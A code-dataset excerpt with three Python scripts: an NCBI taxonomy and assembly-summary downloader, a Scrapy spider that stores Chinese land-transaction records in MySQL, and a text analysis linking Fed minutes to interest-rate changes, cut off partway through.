[\"ftp://ftp.ncbi.nih.gov/pub/taxonomy/accession2taxid/nucl_gb.accession2taxid.gz\",\r\n \"ftp://ftp.ncbi.nih.gov/pub/taxonomy/accession2taxid/nucl_wgs.accession2taxid.gz\"]\r\n cmd0 = \"mkdir taxonomy\"\r\n subprocess.check_output(cmd0, shell=True)\r\n cmd1 = \"cd taxonomy && wget %s\"%taxonomy_url[0]\r\n cmd2 = \"cd taxonomy && tar -zxvf %s\"%taxonomy_url[0].split(\"/\")[5]\r\n subprocess.check_output(cmd1, shell=True)\r\n subprocess.check_output(cmd2, shell=True)\r\n for url in taxonomy_urls:\r\n cmd3 = \"cd taxonomy && wget %s\"%url\r\n cmd4 = \"cd taxonomy && gunzip %s\"%url.split(\"/\")[6]\r\n subprocess.check_output(cmd3, shell=True)\r\n subprocess.check_output(cmd4, shell=True)\r\n\r\n\r\ndef download_assembly():\r\n\r\n #ref seq genomes info download\r\n refseq_url = [\"ftp://ftp.ncbi.nih.gov/genomes/refseq/assembly_summary_refseq.txt\"]\r\n refseq_url_list = [\"ftp://ftp.ncbi.nih.gov/genomes/refseq/bacteria/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/refseq/archaea/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/refseq/fungi/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/refseq/viral/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/refseq/protozoa/assembly_summary.txt\"]\r\n\r\n # genbank genomes info download\r\n genbank_url = [\"ftp://ftp.ncbi.nih.gov/genomes/genbank/assembly_summary_genbank.txt\"]\r\n genbank_url_list = [\"ftp://ftp.ncbi.nih.gov/genomes/genbank/bacteria/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/genbank/archaea/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/genbank/fungi/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/genbank/viral/assembly_summary.txt\",\r\n \"ftp://ftp.ncbi.nih.gov/genomes/genbank/protozoa/assembly_summary.txt\"]\r\n\r\n # options \"refseq\"\r\n if args.input_type == \"refseq\":\r\n cmd = \"wget -O %s_%s %s\"%(refseq_url[0].split(\"/\")[4],refseq_url[0].split(\"/\")[5],refseq_url[0])\r\n subprocess.check_output(cmd, shell=True)\r\n for ref_url in refseq_url_list:\r\n cmd1 = \"wget -O %s_%s_%s %s\"%(ref_url.split(\"/\")[4],ref_url.split(\"/\")[5],ref_url.split(\"/\")[6],ref_url)\r\n subprocess.check_output(cmd1, shell=True)\r\n\r\n # options \"genbank\"\r\n elif args.input_type == \"genbank\":\r\n cmd = \"wget -O %s_%s %s\"%(genbank_url[0].split(\"/\")[4],genbank_url[0].split(\"/\")[5],genbank_url[0])\r\n subprocess.check_output(cmd, shell=True)\r\n for genbank_url in genbank_url_list:\r\n cmd1 = \"wget -O %s_%s_%s %s\"%(genbank_url.split(\"/\")[4],genbank_url.split(\"/\")[5],genbank_url.split(\"/\")[6],genbank_url)\r\n subprocess.check_output(cmd1, shell=True)\r\n\r\n # options \"all\"\r\n elif args.input_type == \"all\":\r\n # total info\r\n merger_url = []\r\n merger_url.append(refseq_url[0])\r\n merger_url.append(genbank_url[0])\r\n\r\n # split info\r\n merger_url_list = []\r\n for i in refseq_url_list:\r\n merger_url_list.append(i)\r\n for j in genbank_url_list:\r\n merger_url_list.append(j)\r\n for url in merger_url:\r\n cmd = \"wget -O %s_%s %s\"%(url.split(\"/\")[4],url.split(\"/\")[5],url)\r\n subprocess.check_output(cmd, shell=True)\r\n for url1 in merger_url_list:\r\n cmd1 = \"wget -O %s_%s_%s %s\"%(url1.split(\"/\")[4],url1.split(\"/\")[5],url1.split(\"/\")[6],url1)\r\n subprocess.check_output(cmd1, shell=True)\r\n else:\r\n print(\"ERROR: CHECK THE TYPE\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=\"Download assembly summary from genbank or refseq\")\r\n parser.add_argument('-tax', \"--taxonomy\", type=str, help= \"GenBank taxonomy files\")\r\n parser.add_argument('-type',\"--input_type\",type=str, help=\"input the download directory such as 'refseq', 'genbank' or 'all'\")\r\n args = parser.parse_args()\r\n if args.taxonomy == \"taxonomy\":\r\n taxonomy()\r\n elif args.input_type == \"refseq\" or args.input_type == \"genbank\" or args.input_type == \"all\":\r\n download_assembly()\r\n else:\r\n print(\"usage: download_assembly_summary_v1.py [-h] [-type INPUT_TYPE] [-tax TAXONOMY]\")\r\n","sub_path":"01_download_assembly_summary.py","file_name":"01_download_assembly_summary.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"563681373","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom pymysql import *\n\n\nclass IptestSpider(scrapy.Spider):\n name = 'fail'\n allowed_domains = ['landchina.mnr.gov.cn']\n # start_urls = ['http://landchina.mnr.gov.cn/land/jggg/gpcr1/202006/t20200610_7476600.htm'] # 开始爬取的位置\n urls = [] # 开始爬取的位置\n index = 0\n file_name = None\n\n def __init__(self, f=None, *args, **kwargs):\n super(IptestSpider, self).__init__(*args, **kwargs)\n self.file_name = f\n\n def start_requests(self):\n\n # file = open(\"C:\\\\Users/仙/Desktop/links_pure.txt\")\n file = open(\"/Users/xxm/develop/py_workspace/scrapy_learn/scrapy_learn/spiders/files/\" + str(\n self.file_name) + \".txt\")\n\n while True:\n text = file.readline() # 只读取一行内容\n # 判断是否读取到内容\n if not text:\n break\n # self.start_urls.append(text)\n url = text.replace('\\n', '')\n # print(url)\n yield scrapy.Request(url=url, callback=self.parse, dont_filter=True)\n\n print('------->>>>> 结束 ', len(self.start_urls))\n\n # yield scrapy.Request(url=self.start_urls[self.index], callback=self.parse, dont_filter=True)\n\n # start_urls结果返回到parse\n def parse(self, response):\n url = response.request.url\n\n # if (len(self.urls) == 0):\n # file = open(\"C:\\\\Users/仙/Desktop/links_pure.txt\")\n # while True:\n # text = file.readline() # 只读取一行内容\n # # 判断是否读取到内容\n # if not text:\n # break\n # self.urls.append(text)\n #\n # print('-------------->>>>', len(self.urls))\n # 行政区\n obj = {\n 'xzq': '',\n 'xmmc': '',\n 'xmwz': '',\n 'gymj': '',\n 'clmj': '',\n 'gdfs': '',\n 'tdyt': '',\n 'synx': '',\n 'hyfl': '',\n 'tdjb': '',\n 'cjjg': '',\n 'zfqh': '',\n 'ydzfrq': '',\n 'ydzfje': '',\n 'tdsyqr': '',\n 'bz': '',\n 'ydrjlx': '',\n 'ydrjls': '',\n 'ydjdsj': '',\n 'ydkgsj': '',\n 'ydjgsj': '',\n 'sjkgsj': '',\n 'sjjgsj': '',\n 'pzdw': '',\n 'htqdrq': '',\n 'url': url\n\n }\n obj['url'] = url\n xpath_url = '//div[@class=\"gu-art-con\"]/table/tr[2]/td[2]/text()'\n if len(response.xpath(xpath_url).extract()):\n xzq = response.xpath(xpath_url).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['xzq'] = xzq\n\n xmmc_u = '//div[@class=\"gu-art-con\"]/table/tr[3]/td[2]/text()'\n if len(response.xpath(xmmc_u).extract()):\n xmmc = response.xpath(xmmc_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['xmmc'] = xmmc\n\n xmwz_u = '//div[@class=\"gu-art-con\"]/table/tr[4]/td[2]/text()'\n if len(response.xpath(xmwz_u).extract()):\n xmwz = response.xpath(xmwz_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['xmwz'] = xmwz\n\n gymj_u = '//div[@class=\"gu-art-con\"]/table/tr[5]/td[2]/text()'\n if len(response.xpath(gymj_u).extract()):\n gymj = response.xpath(gymj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['gymj'] = gymj\n\n clmj_u = '//div[@class=\"gu-art-con\"]/table/tr[5]/td[4]/text()'\n if len(response.xpath(clmj_u).extract()):\n clmj = response.xpath(clmj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['clmj'] = clmj\n\n tdyt_u = '//div[@class=\"gu-art-con\"]/table/tr[6]/td[2]/text()'\n if response.xpath(tdyt_u).extract():\n tdyt = response.xpath(tdyt_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['tdyt'] = tdyt\n\n gdfs_u = '//div[@class=\"gu-art-con\"]/table/tr[6]/td[4]/text()'\n if len(response.xpath(gdfs_u).extract()):\n gdfs = response.xpath(gdfs_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['gdfs'] = gdfs\n\n synx_u = '//div[@class=\"gu-art-con\"]/table/tr[7]/td[2]/text()'\n if len(response.xpath(synx_u).extract()):\n synx = response.xpath(synx_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['synx'] = synx\n\n hyfl_u = '//div[@class=\"gu-art-con\"]/table/tr[7]/td[4]/text()'\n if len(response.xpath(hyfl_u).extract()):\n hyfl = response.xpath(hyfl_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['hyfl'] = hyfl\n\n tdjb_u = '//div[@class=\"gu-art-con\"]/table/tr[8]/td[2]/text()'\n if len(response.xpath(tdjb_u).extract()):\n tdjb = response.xpath(tdjb_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['tdjb'] = tdjb\n\n cjjg_u = '//div[@class=\"gu-art-con\"]/table/tr[8]/td[4]/text()'\n if len(response.xpath(cjjg_u).extract()):\n cjjg = response.xpath(cjjg_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['cjjg'] = cjjg\n\n # /table/tbody/tr[2]/td[1]/text()\n\n zfqh_u = '//div[@class=\"gu-art-con\"]/table/tr[9]/td[2]/table/tr[2]/td[1]/text()'\n if len(response.xpath(zfqh_u).extract()):\n zfqh = response.xpath(zfqh_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['zfqh'] = zfqh\n\n ydzfrq_u = '//div[@class=\"gu-art-con\"]/table/tr[9]/td[2]/table/tr[2]/td[2]/script'\n if len(response.xpath(ydzfrq_u).extract()):\n ydzfrq = \\\n response.xpath(ydzfrq_u).extract()[0].replace('\\n', '').replace(' ', '').split('var a = \\'')[1].split(\n '\\';')[0]\n obj['ydzfrq'] = ydzfrq\n\n ydzfje_u = '//div[@class=\"gu-art-con\"]/table/tr[9]/td[2]/table/tr[2]/td[3]/text()'\n if len(response.xpath(ydzfje_u).extract()):\n ydzfje = response.xpath(ydzfje_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydzfje'] = ydzfje\n\n bz_u = '//div[@class=\"gu-art-con\"]/table/tr[9]/td[2]/table/tr[2]/td[4]/text()'\n if (len(response.xpath(bz_u).extract())):\n bz = response.xpath(bz_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['bz'] = bz\n\n tdsyqr_u = '//div[@class=\"gu-art-con\"]/table/tr[10]/td[2]/text()'\n if len(response.xpath(tdsyqr_u).extract()):\n tdsyqr = response.xpath(tdsyqr_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['tdsyqr'] = tdsyqr\n\n ydrjlx_u = '//div[@class=\"gu-art-con\"]/table/tr[11]/td[2]/table/tr[1]/td[2]/text()'\n if len(response.xpath(ydrjlx_u).extract()):\n ydrjlx = response.xpath(ydrjlx_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydrjlx'] = ydrjlx\n\n ydrjls_u = '//div[@class=\"gu-art-con\"]/table/tr[11]/td[2]/table/tr[1]/td[4]/text()'\n if len(response.xpath(ydrjls_u).extract()):\n ydrjls = response.xpath(ydrjls_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydrjls'] = ydrjls\n\n ydjdsj_u = '//div[@class=\"gu-art-con\"]/table/tr[11]/td[4]/text()'\n if (len(response.xpath(ydjdsj_u).extract())):\n ydjdsj = response.xpath(ydjdsj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydjdsj'] = ydjdsj\n\n ydkgsj_u = '//div[@class=\"gu-art-con\"]/table/tr[12]/td[2]/text()'\n if (len(response.xpath(ydkgsj_u).extract())):\n ydkgsj = response.xpath(ydkgsj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydkgsj'] = ydkgsj\n\n ydjgsj_u = '//div[@class=\"gu-art-con\"]/table/tr[12]/td[4]/text()'\n if (len(response.xpath(ydjgsj_u).extract())):\n ydjgsj = response.xpath(ydjgsj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['ydjgsj'] = ydjgsj\n\n sjkgsj_u = '//div[@class=\"gu-art-con\"]/table/tr[13]/td[2]/text()'\n if (len(response.xpath(sjkgsj_u).extract())):\n sjkgsj = response.xpath(sjkgsj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['sjkgsj'] = sjkgsj\n\n sjjgsj_u = '//div[@class=\"gu-art-con\"]/table/tr[13]/td[4]/text()'\n if (len(response.xpath(sjjgsj_u).extract())):\n sjjgsj = response.xpath(sjjgsj_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['sjjgsj'] = sjjgsj\n\n pzdw_u = '//div[@class=\"gu-art-con\"]/table/tr[14]/td[2]/text()'\n if (len(response.xpath(pzdw_u).extract())):\n pzdw = response.xpath(pzdw_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['pzdw'] = pzdw\n\n htqdrq_u = '//div[@class=\"gu-art-con\"]/table/tr[14]/td[4]/text()'\n if (len(response.xpath(htqdrq_u).extract())):\n htqdrq = response.xpath(htqdrq_u).extract()[0].replace(' ', '').replace('\\xa0\\xa0\\n', '')\n obj['htqdrq'] = htqdrq\n\n # print('-------------------')\n # print(response.xpath(ydrjl_u).extract())\n\n # 写mysql\n # sql = 'INSERT INTO fail0_copy' + str(self.file_name) \\\n sql = 'INSERT INTO fail0' \\\n + ' (xzq,xmmc,xmwz,gymj,clmj,gdfs,synx,hyfl,tdjb,cjjg,zfqh,ydzfrq,ydzfje,tdsyqr,bz,ydrjlx,' \\\n 'ydrjls,ydjdsj,ydkgsj,ydjgsj,sjkgsj,sjjgsj,pzdw,htqdrq,tdyt,url,create_date)' \\\n ' VALUES' \\\n ' ( ' \\\n \" %s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,\" \\\n \"%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,\" \\\n \" %s,now())\"\n\n args = (str(obj['xzq']),\n str(obj['xmmc']),\n str(obj['xmwz']),\n str(obj['gymj']),\n str(obj['clmj']),\n str(obj['gdfs']),\n str(obj['synx']),\n str(obj['hyfl']),\n str(obj['tdjb']),\n str(obj['cjjg']),\n str(obj['zfqh']),\n str(obj['ydzfrq']),\n str(obj['ydzfje']),\n str(obj['tdsyqr']),\n str(obj['bz']),\n str(obj['ydrjlx']),\n str(obj['ydrjls']),\n str(obj['ydjdsj']),\n str(obj['ydkgsj']),\n str(obj['ydjgsj']),\n str(obj['sjkgsj']),\n str(obj['sjjgsj']),\n str(obj['pzdw']),\n str(obj['htqdrq']),\n str(obj['tdyt']),\n url\n )\n # f_res = open(\n # \"/Users/xxm/develop/py_workspace/scrapy_learn/scrapy_learn/spiders/files/res/\" + str(self.file_name), 'a')\n # f_res.write(str(obj)+\"\\n\")\n # f_res.close()\n print(sql)\n sql = sql.replace('\\\\', '')\n try:\n cur.execute(sql, args)\n con.commit()\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n except Exception as e:\n print(e)\n print('==========@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@=========', url)\n f = open(\"/Users/xxm/develop/py_workspace/scrapy_learn/scrapy_learn/spiders/files/fail_url\", 'a')\n f.write(url + '\\n')\n f.close()\n # print('=======>>对象:', obj)\n print('---------------------->>>>>>>>>>>>>>>>>>>>>>>>>', self.index)\n self.index = self.index + 1\n\n # if (self.index < (len(self.urls))):\n # url = self.urls[self.index].replace('\\n', '')\n # yield scrapy.Request(url=url, callback=self.parse, dont_filter=True)\n # self.index = self.index + 1\n # pass\n\n\nif __name__ == '__main__':\n try:\n 1 / 0\n except Exception as e:\n print('\\033[1;35;0m', e, '\\033[0m')\n f = open(\"/Users/xxm/develop/py_workspace/scrapy_learn/scrapy_learn/spiders/files/fail_url\", 'a')\n f.write('------------' + '\\n')\n f.close()\n print(111)\n","sub_path":"scrapy_learn/spiders/detail_f.py","file_name":"detail_f.py","file_ext":"py","file_size_in_byte":12100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"466816133","text":"##single minutes interval, LSA for bow\r\nimport os\r\nfrom dfply import *\r\nimport pandas as pd\r\nimport re\r\nfrom sklearn import preprocessing\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom nltk.tokenize import word_tokenize\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom multiprocessing import Pool\r\nimport warnings\r\nfrom nltk.stem import WordNetLemmatizer\r\nwarnings.filterwarnings(\"ignore\",category=DeprecationWarning)\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\nimport statsmodels.api as sm\r\nminutes = pd.read_csv(r'C:\\Users\\Comete\\Desktop\\MFinRelated\\nlp\\NLPTA_project-master\\NLPTA_project-master\\docs.csv')\r\n\r\nfrom collections import Counter\r\n\r\n\r\ndef word_prob(word): \r\n return dictionary[word]/total\r\n\t\r\n\t\r\ndef words(text): \r\n return re.findall('[a-z]+', text.lower()) \r\n\t\r\ndef viterbi_segment(text):\r\n probs, lasts = [1.0], [0]\r\n for i in range(1, len(text) + 1):\r\n prob_k, k = max((probs[j] * word_prob(text[j:i]), j)\r\n for j in range(max(0, i - max_word_length), i))\r\n probs.append(prob_k)\r\n lasts.append(k)\r\n words = []\r\n i = len(text)\r\n while 0 < i:\r\n words.append(text[lasts[i]:i])\r\n i = lasts[i]\r\n words.reverse()\r\n return words, probs[-1]\r\n\r\ndictionary = Counter(words(open(r'C:\\Users\\Comete\\big.txt').read()))\r\nmax_word_length = max(map(len, dictionary))\r\ntotal = float(sum(dictionary.values()))\r\n\r\n\r\n# 1. data processing\r\nminutes.pop(minutes.columns[0])\r\nfrom nltk.corpus import stopwords\r\nimport spacy\r\nnlp = spacy.load('en_core_web_sm',disable=['parser', 'ner'])\r\n\r\nstop_words = stopwords.words('english')\r\n\r\nimport datetime\r\nMonth = [datetime.date(2008, i, 1).strftime('%B').lower() for i in range(1,13)]\r\nstop_words.extend(['year','month','day','mr','meeting','committee','ms','federal','page']\r\n + Month)\r\n\r\nimport gensim\r\ndef sent_to_words(sentences):\r\n for sentence in sentences:\r\n yield(gensim.utils.simple_preprocess(str(sentence), deacc=True)) # deacc=True removes punctuations\r\n\r\ntexts = list(sent_to_words(minutes['content']))\r\n\r\nbigram = gensim.models.Phrases(texts, min_count=5, threshold=100) # higher threshold fewer phrases.\r\nbigram_mod = gensim.models.phrases.Phraser(bigram)\r\n\r\nfrom gensim.utils import simple_preprocess\r\ndef remove_stopwords(texts):\r\n return [[word for word in simple_preprocess(str(doc)) if word not in stop_words] for doc in texts]\r\n\r\ndef make_bigrams(texts):\r\n return [bigram_mod[doc] for doc in texts]\r\n\r\ndef lemmatization(data, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']):\r\n texts_out = []\r\n for sent in data:\r\n doc = nlp(re.sub('\\_','',\" \".join(sent)))\r\n tokens = [token.lemma_ for token in doc if token.pos_ in allowed_postags]\r\n new_tokens = []\r\n for i in tokens:\r\n for j in viterbi_segment(i)[0]:\r\n new_tokens.append(j)\r\n texts_out.append(new_tokens)\r\n return texts_out\r\n\r\ncorpus_no_stops = remove_stopwords(texts)\r\ncorpus_bigrams = make_bigrams(corpus_no_stops)\r\nset(['infla_tion' in word for word in corpus_bigrams])\r\ndata_lemmatized = lemmatization(corpus_bigrams, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV'])\r\n\r\ncorpus = [' '.join(wordList) for wordList in data_lemmatized]\r\nset(['infla_tion' in word for word in corpus])\r\n\r\n# bag of words with sklearn\r\nvectorizer = CountVectorizer(stop_words = 'english',lowercase = True)\r\nAnnualBow = vectorizer.fit_transform(corpus)\r\ndf_AnnualBow = pd.DataFrame(AnnualBow.A,columns = vectorizer.get_feature_names())\r\nfor term in ['year','month','day']:\r\n try:\r\n df_AnnualBow.pop(term)\r\n except:\r\n continue\r\n\r\n'month' in df_AnnualBow.columns\r\n\r\ndf_AnnualBow.astype(bool).sum(axis=1)\r\nfrequency = df_AnnualBow.astype(bool).sum(axis=0)\r\nless = frequency[frequency<3]\r\ndf_AnnualBow=df_AnnualBow.drop(less.index,axis=1)\r\n\r\n##remove thoes meaningness words\r\n\r\nbowScaled = preprocessing.scale(df_AnnualBow)\r\ndf_bowScaled = pd.DataFrame(bowScaled,columns=df_AnnualBow.columns)\r\nminutes_BoW_sk2 = pd.concat([minutes,df_bowScaled],axis = 1)\r\n\r\n# tf-idf sklearn\r\nv = TfidfVectorizer(stop_words='english', max_df=0.9)\r\ntfidf = v.fit_transform(corpus)\r\ndf_Annualtfidf = pd.DataFrame(tfidf.A,columns = v.get_feature_names())\r\n\r\nfor term in ['year','month','day']:\r\n try:\r\n df_Annualtfidf.pop(term)\r\n except:\r\n continue\r\n\r\ndf_Annualtfidf.astype(bool).sum(axis=1)\r\nfrequency2 = df_Annualtfidf.astype(bool).sum(axis=0)\r\nless2 = frequency2[frequency<3]\r\ndf_Annualtfidf=df_Annualtfidf.drop(less2.index,axis=1)\r\n\t\t\r\ntfidfScaled = preprocessing.scale(df_Annualtfidf)\r\ndf_tfidfScaled = pd.DataFrame(tfidfScaled,columns=df_Annualtfidf.columns)\r\nminutes_tfidf_sk = pd.concat([minutes,df_tfidfScaled],axis = 1)\r\n\r\n# import interest rate data and merge them\r\nIR = pd.read_csv(r'C:\\Users\\Comete\\Desktop\\MFinRelated\\nlp\\NLPTA_project-master\\NLPTA_project-master\\fed-funds-rate-historical-chart.csv')\r\nIR >> head(3)\r\n\r\nminutes_BoW_sk2['oldDate'] =pd.to_datetime(minutes_BoW_sk2['file_name'],format='%Y%m%d',errors='ignore')\r\nminutes_tfidf_sk['oldDate'] =pd.to_datetime(minutes_tfidf_sk['file_name'],format='%Y%m%d',errors='ignore')\r\nIR['Date'] = pd.to_datetime(IR['date'],format='%Y/%m/%d',errors='ignore')\r\n\r\nminutes_BoW_sk2['Date'] = minutes_BoW_sk2['oldDate'] + datetime.timedelta(days=23)\r\nminutes_tfidf_sk['Date'] = minutes_tfidf_sk['oldDate'] + datetime.timedelta(days=23)\r\n\r\nbow_IR = pd.merge(IR,minutes_BoW_sk2,on = 'Date',how = 'left')\r\n\r\ntfIdf_IR = pd.merge(IR,minutes_tfidf_sk,on = 'Date',how = 'left')\r\n\r\nbow_IR_diff = bow_IR.dropna()\r\nbow_IR_diff['rateChange'] = bow_IR_diff['fedRate'].shift(-1) - bow_IR_diff['fedRate']\r\ntfIdf_IR_diff = tfIdf_IR.dropna()\r\ntfIdf_IR_diff['rateChange'] = tfIdf_IR_diff['fedRate'].shift(-1) - tfIdf_IR_diff['fedRate']\r\n\r\ndef CorTerms(terms,df_sum,y,top = None,bottom = None):\r\n correlations = [np.corrcoef(y,df_sum[term])[0,1]\r\n for term in list(terms)]## change the index\r\n IR_corTerms = pd.DataFrame({'keyterms':terms,'correlations':correlations})\r\n top = IR_corTerms.sort_values(by = 'correlations',ascending = False) >> head(top)\r\n bottom = IR_corTerms.sort_values(by = 'correlations',ascending = True) >> head(bottom)\r\n return IR_corTerms,top,bottom\r\n\r\ndef corBar(x,y):\r\n plt.barh(range(len(x)), y, height=0.7, color='steelblue', alpha=0.8) \r\n plt.yticks(range(len(x)), x)\r\n plt.xlabel(\"correlations\")\r\n plt.ylabel('keyterms')\r\n plt.title(\" correlations with IR change\")\r\n plt.show()\r\n\r\nbow_IR_diff = bow_IR_diff.dropna()\r\nbow_IR_diff=bow_IR_diff.drop(['date_x','year','month','day','file_name','oldDate','content'],axis=1)\r\nbow_IR_diff.sort_values(by=['Date','rateChange'],ascending = True)\r\nCorBowIR = CorTerms(bow_IR_diff.columns[2:-1],bow_IR_diff,bow_IR_diff['rateChange'],top = 20,bottom = 20)\r\nbow_top = CorBowIR[1]\r\nbow_bottom = CorBowIR[2]\r\ncorBar(bow_top['keyterms'],bow_top['correlations'])\r\ncorBar(bow_bottom['keyterms'],bow_bottom['correlations'])\r\n\r\ntfIdf_IR_diff = tfIdf_IR_diff.dropna()\r\ntfIdf_IR_diff=tfIdf_IR_diff.drop(['date_x','year','month','day','file_name','oldDate','content'],axis=1)\r\ntfIdf_IR_diff.sort_values(by=['Date','rateChange'],ascending = True)\r\nCorTfidfIR = CorTerms(tfIdf_IR_diff.columns[2:-1],tfIdf_IR_diff,tfIdf_IR_diff['rateChange'],top = 20,bottom = 20)\r\ntfIdf_top = CorTfidfIR[1]\r\ntfIdf_bottom = CorTfidfIR[2]\r\ncorBar(tfIdf_top['keyterms'],tfIdf_top['correlations'])\r\ncorBar(tfIdf_bottom['keyterms'],tfIdf_bottom['correlations'])\r\n\r\n\r\n#LSA\r\nfrom __future__ import print_function\r\nfrom sklearn.decomposition import TruncatedSVD\r\nimport sklearn\r\nfrom sklearn.preprocessing import Normalizer\r\nfrom sklearn import metrics\r\nfrom sklearn.cluster import KMeans, MiniBatchKMeans\r\nlsa=TruncatedSVD(400,algorithm='arpack')\r\ndf_bow_lsa = lsa.fit_transform(df_bowScaled)\r\ndf_bow_lsa = Normalizer(copy=False).fit_transform(df_bow_lsa)\r\ndf_bow_lsa = pd.DataFrame(df_bow_lsa, columns = [\"component%d\" % i for i in range(1,401)])\r\nminutes_bow_lsa = pd.concat([minutes,df_bow_lsa],axis = 1)\r\nminutes_bow_lsa['oldDate'] =pd.to_datetime(minutes_bow_lsa['file_name'],format='%Y%m%d',errors='ignore')\r\n\r\nminutes_bow_lsa['Date'] = minutes_bow_lsa['oldDate'] + datetime.timedelta(days=23)\r\nbow_IR_lsa = pd.merge(IR,minutes_bow_lsa,on = 'Date',how = 'left')\r\nbow_IR_diff_lsa = bow_IR_lsa.dropna()\r\nbow_IR_diff_lsa['rateChange'] = bow_IR_diff_lsa['fedRate'].shift(-1) - bow_IR_diff_lsa['fedRate']\r\nbow_IR_diff_lsa = bow_IR_diff_lsa.dropna()\r\nbow_IR_diff_lsa=bow_IR_diff_lsa.drop(['year','month','day','file_name','oldDate','content'],axis=1)\r\nCorbowIR_lsa = CorTerms(bow_IR_diff_lsa.columns[3:-1],bow_IR_diff_lsa,bow_IR_diff_lsa['rateChange'],top = 20,bottom = 20)\r\nbow_top_lsa = CorbowIR_lsa[1]\r\nbow_bottom_lsa = CorbowIR_lsa[2]\r\ncorBar(bow_top_lsa['keyterms'],bow_top_lsa['correlations'])\r\ncorBar(bow_bottom_lsa['keyterms'],bow_bottom_lsa['correlations'])\r\nimport numpy as np\r\nsimilarity = np.asarray(np.asmatrix(df_bow_lsa) * np.asmatrix(df_bow_lsa).T)\r\nsimilarity = pd.DataFrame(similarity,index=minutes_bow_lsa['Date'], columns=minutes_bow_lsa['Date'])\r\n\r\n\r\n# logistic regression\r\n\r\nIR_ChID= np.where(bow_IR_diff_lsa['rateChange']>0,1,0)\r\nbow_IR_diff_lsa.insert(1,'IR_ChID',IR_ChID)\r\nbow_IR_diff_lsa\r\n## to improve the model, I would filter out thoes insignifiant terms\r\nfrom sklearn.feature_selection import f_regression\r\nwords = bow_IR_diff_lsa.columns[4:-1]\r\nX = bow_IR_diff_lsa[words] \r\ny = bow_IR_diff_lsa['IR_ChID']\r\nlogisreg = f_regression(X, y, center=True)\r\nFvalue = logisreg[0]\r\nPvalue = logisreg[1]\r\n\r\nstat_CorbowIR = CorbowIR_lsa[0]\r\nstat_CorbowIR['Fvalue'] = Fvalue\r\nstat_CorbowIR['Pvalue'] = Pvalue\r\n\r\nsignTerms = stat_CorbowIR.query('Pvalue < 0.05')\r\n\r\nsignTerms['Cor_P'] = signTerms['correlations'] /signTerms['Pvalue']*signTerms['Fvalue']\r\nsignTermsBottom = signTerms.sort_values(by='correlations', ascending=True) >> head(20)\r\nsignTermsTop = signTerms.sort_values(by = 'correlations', ascending=False) >> head(20)\r\n\r\ncorBar(signTermsTop['keyterms'],signTermsTop['correlations'])\r\ncorBar(signTermsBottom['keyterms'],signTermsBottom['correlations'])\r\n\r\nID_var = signTerms['keyterms'].tolist()\r\nX = bow_IR_diff_lsa[ID_var]\r\ny= IR_ChID\r\n\r\n\r\n#machine learning for prediction\r\n\r\nfrom sklearn.model_selection import train_test_split,GridSearchCV\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn import tree\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.gaussian_process.kernels import RBF\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.linear_model import LogisticRegression\r\nimport time\r\nfrom sklearn.svm 